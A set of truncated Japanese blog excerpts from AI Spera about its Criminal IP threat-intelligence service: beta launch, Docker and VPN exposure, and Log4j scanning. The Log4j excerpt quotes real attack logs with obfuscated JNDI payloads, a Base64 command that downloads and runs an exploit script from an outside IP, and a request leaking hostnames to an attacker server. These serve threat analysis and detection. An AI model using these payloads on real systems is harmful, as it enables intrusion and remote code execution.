2022年4月28日に開始されたサイバー脅威検索エンジン Criminal IP の無料ベータ版サービスが順調に進んでいます。事前登録いただいた約2千名のテスターとベータ版サービスの開始後に登録いただいた方々に感謝の言葉をお伝えします。 > 無料ベータ版サービスを見る < 取集されたバグレポートのパッチ案内 約2週間のベータ版サービスの間、当社が発見できなかった Criminal IP のさまざまなバグレポートが収集されました。サービスの改善にご協力いただき誠にありがとうございます。現在、Criminal IP QA ticket system で提供していただいたバグが収集されており、技術チームがすべてのバグを修正しております。収集されたバグは今週中に修正され、パッチされる予定です。 新しい機能が追加されます!ドメイン検索のリリース案内 そして、多くの方々が期待しているドメイン検索機能が2週間以内にリリースされる予定です。現在、安定化テストは仕上げ段階にあり、もうすぐ Criminal
[お知らせ] グローバルベータ版サービス開始 ! Criminal IP のベータ版テスター募集が4月27日に終了し、多くの関心と期待と共に事前登録とウェブページへの訪問いただいた 82国の数千人のベータ版テスターに感謝申し上げます。盛況のうちにベータ版テスターの募集を終了致しまして嬉しい思いを込めて、事前登録ページや技術ブログ、SNSチャンネルなどを訪問してくださって熱心な声援を送ってくださったお客様にも心から感謝の言葉をお届けします。4月6日から始まった事前登録に数千人の利用者が登録していただき、これからもベータ版サービスを利用するユーザーは益々増える見込みです。新しく改装された当社の Criminal IP ベータ版サービスについて、改めてご紹介いたします。 ▶無料ベータ版サービスを見る◀ ベータ版サービスの概要 Criminal IP は既にさまざまな業界で検証された活用性をもとに、グローバル B2C バージョンをリリースしてサイバーセキュリティに関心を持っている個人も脅威インテリジェンスベースの検索エンジンを使用できるように開発されました。これまでは、企業向けの B2B 形態で提供されていた
Criminal IP の誕生ストーリー 国内外のサイバー犯罪の増加により、侵害事故分析技術とこれを通じたインテリジェンスベースのインサイトを提供するサービスに対する需要は著しく増加したが、これには莫大な初期費用、情報収集及び人材の確保が避けられず、AI Spera はこうしたセキュリティニーズに合致してサイバー脅威の診断に役立つサービスを独自的に開発しました。 サイバー犯罪の痕跡を追跡し、特定するための最も重要な手がかりとして使用される情報は、IP アドレスと言えます。IPアドレスがインターネット上で発生したすべてのことをタイムラインで記録し、総合的な履歴情報を提供する犯罪記録部を作成し、機械学習、AI、行為基盤の異常兆候検出を重点的に収集する「DATA-DRIVEN SECURITY」という概念に着目しました。 IPアドレスに基づくサイバー脅威インテリジェンス(Cyber Threat Intelligence)とは サイバー脅威インテリジェンスとは、基本的にビジネス上の意思決定に関連するサイバー脅威のリスクを最小限に抑え、最も効果的に対応できるよう助ける証拠ベースのセキュリティ情報の収集を意味することです。犯罪現場に残っている指紋を通じて犯人の身元を把握するのように、サイバー犯罪では IP アドレスが不正アクセス、アカウント乗っ取り、不正決済、資金洗浄、クレデンシャルスタッフィング(Credential stuffing)など匿名の攻撃を推定するのに最も大事に使われる手がかりであるためです。Criminal IP の場合、IP アドレスに基づいて DB
デジタルイノベーションの加速と多数の企業がクラウドにビジネスを拡大しながら、管理されていないさまざまな外部攻撃対象領域(VPN、RDP、SMB、証明書、モバイルデバイスなど)によって攻撃者の侵入が頻繁に発生しています。 外部攻撃対象領域を成功的に保護するには、正確なIT資産を特定し、セキュリティポリシーに反するサービス、オープンポートなどが存在するかをリアルタイムでモニタリングする必要があります。 ほとんどの企業が攻撃者の侵入を経験する理由は、特定されていないIT資産とセキュリティポリシーの違反によるものです。 これらの侵入は、利用していたセキュリティプロセスとソリューションでは防御に限界があるため、セキュリティ担当者は新しい戦略を練るしかないです。 Criminal IPでは、アセット検索によるキーワード検索だけでも会社の資産を特定し、脆弱性が存在するかどうかを確認できます。 たとえば、会社名をキーワード検索すると、IPごとに国、オープンポート、サービス、ASネーム、製品の現状を確認でき、この情報を通じてセキュリティポリシーに反するオープンポート、サービスが存在するのか、脆弱なIPなのかなどをチェックできます。 アセット検索による会社名検索の結果 アセット検索による会社名検索の結果 アセット検索の結果に基づいて、下のようにセキュリティチェックを行い、脆弱性に対する改善措置を取るための情報を取得できます。 アセット検索結果による脆弱性の点検 Criminal IPは、ワンタイムチェックではなく会社の資産をリアルタイムでモニタリングし、発見された脆弱性に素早く対応できるよう活用できます。
開発組織はコミュニケーション、コラボレーション、生産性を高めるために数多くのツールに依存しており、その中でドッカーやクーバーネティスなどのアプリケーションパッケージングツールを利用する企業が増えています。 ドッカーコンテナを利用すると、アプリケーション、環境設定、複数のライブラリなどを可視化して配布するため、エンジニアがひとつずつPCやサーバーに作業することなく一度にインストールでき、企業やエンジニアがかなり好むツールといえます。 2021年のStackoverflowのアンケート結果を見ると、どのくらいの企業がドッカーを利用しているかがわかります。 提供:Stackoverflow ただし、このような利便性の背後には、ドッカーコンテナをきちんと管理しないと、コード実行、ディレクトリトラバーサル、権限取得などのさまざまな脆弱性が発生し、深刻なダメージを受ける可能性があります。 2014年から現在まで知られているドッカーの脆弱性は合計34種類であり、さまざまな種類の脆弱性のうち7以上のスコアを持つ脆弱性は9つで、二重権限取得、コード実行などのリスクが高い脆弱性も存在しています。 提供:CVE Details 特に、CVE-2019-5736の脆弱性は、runCバグを利用し、ホストのroot権限を取得し、コンテナサーバーや他のコンテナにアクセスできる恐ろしい脆弱性であるなので、下のように影響を受けるバージョンを利用しているとすぐにパッチをしなければなりません。 Docker CE 18.06.2, 18.09.2 以前のバージョン、Docker EE 17.06.2-ee-19
新型コロナウイルス感染症で在宅勤務が増えると同時にVPNを利用する企業も増加し、VPNの脆弱性を悪用した攻撃が増加している状況です。 代表的な例として、韓国での韓国原子力研究院と韓国航空宇宙産業の事例が挙げられますが、いずれも攻撃者がVPNの脆弱性を利用した非認可者の管理者ページへのアクセス、管理者権限なしのパスワード変更などを行ったことが確認されました。 海外の場合、中国のハッカーと見られるハッカーがVPNの脆弱性を利用して米国の防衛産業の一部システムに侵入し、また、ロシアのハッキンググループはVPNの脆弱性を利用して日本及び海外の約900社のVPNアカウント情報を盗用し、内部システムにアクセスしたこともありました。 その他、一般企業でもVPNの脆弱性を活用したハッキングの試み及び事故がしばしば発生していることが知られて、セキュリティ担当者はVPN脆弱性を狙ったハッキングの被害が起こらないように特別な注意を払わなければなりません。 AI Speraのサイバー脅威インテリジェンスプラットフォームCriminal IPはセキュリティ担当者が管理する会社のVPNサービスが外部に漏れているのかを判明し、どのように保護措置を取るべきかを調べてみます。 サイバー脅威インテリジェンス検索エンジン‘Criminal IP’ 世界中のVPNサーバーIPの脆弱性統計 世界中のIPの中でVPNが含まれたIP情報を検索した結果、合計47,270、韓国では950のIPでVPNが含まれていることが分かりました。韓国を中心にもう少し詳しく見ると、VPNサービスが含まれたIPの中でSSL VPNクライアント、SoftEther VPN サーバー、VPNルーターなどのサービスが開かれていることが確認できました。このように確認された多くのVPN IPは、必要に応じてわざと開いた場合もあるでしょうが、管理者だけがアクセスしなければならないVPN IPの場合、攻撃者の攻撃に脆弱なところがある可能性があります。 Criminal IPから検知されたVPNが含まれているIPの国家統計 Criminal IPで確認した外部流出される企業のIPVPNサーバー
Log4jの脆弱性が世界を襲った。ハッカーは、サーバーを丸ごと奪うためにLog4jの脆弱性に感染されたサーバーを見つけ、世界中のすべてのサーバーを毎日スキャンしています。ハッカーがlog4jの脆弱性を持っているサーバーを見つけるためにどのスキャン技術を使用しているかを調べました。 攻撃者は最も単純な方法で "${jndi:ldap://***.*.**.***:53/c}" パケットを送信し、サーバーの反応を調べます。しかし、このパターンはメディアなどにあまりにも多く公開されてきており、IDS・IPSで素早く検出されてブロックされています。したがって、下表のような変形した攻撃が使用されています。変更された攻撃パケットは、jndi:ldap のシグネチャを検出しないように j}ndi, {${::-j}${::-n}${::-d}${::-i}:${ ::-l}${::-d}${::-a}${::-p}, ${jndi:${lower:l}${lower:d}a${lower:p} などの形でペイロードを分割して送信する方法を使用します。 Log4jの一般的な攻撃パターン ""t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//***.**.**.***:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}')"" ""t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//***.**.**.***:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}')"" 8080" "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F45.12.32.61%3A1389%2FOS%3D%24%7Bsys%3Aos.name%7D%2FHN%3D%24%7Benv%3AHOSTNAME%7D%2Ffeb12a13-5fe3-429a-bd12-ed0c72e2ad20%7D HTTP/1.1"" 403 152 ""-""
